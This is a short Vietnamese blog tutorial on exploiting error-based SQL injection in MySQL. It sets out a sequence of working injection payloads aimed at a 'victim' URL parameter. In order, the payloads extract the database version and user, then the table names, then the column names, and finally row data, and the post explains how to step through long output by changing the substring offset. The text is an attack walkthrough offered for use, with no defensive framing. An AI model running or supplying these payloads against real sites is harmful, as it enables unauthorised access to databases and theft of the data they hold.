[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind
Ví dụ victim có dạng:
Lệnh get version, database
http://target.com/page.php?id = 1 And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR  (124))x From Information_Schema.Tables Group By x)a)
Tương tự vậy, lệnh get table:
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(table_name),1,145) FROM information_schema.tables  where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)
Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….)
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(table_name),63,145) FROM information_schema.tables  where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)
Tiếp theo, lấy column của một table nào đó
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(column_name),1,145) FROM information_schema.columns  where table_schema=database() and table_name=0xso_hex_cua_tablename)  ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By  x)a)
Tăng số 1 theo nguyên tắc như trên.
Và cuối cùng là dữ liệu:
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM  table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)
Có những trang tăng số lượng lên rất nhiều :( Hên là có tool để thực hiện dạng này…Chờ hồi sau sẽ rõ :P

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind [TUT] Khai thác lỗi SQL Injection dạng error-based quick blind Reviewed by tiền hình con khỉ on 23:29 Rating: 5

Không có nhận xét nào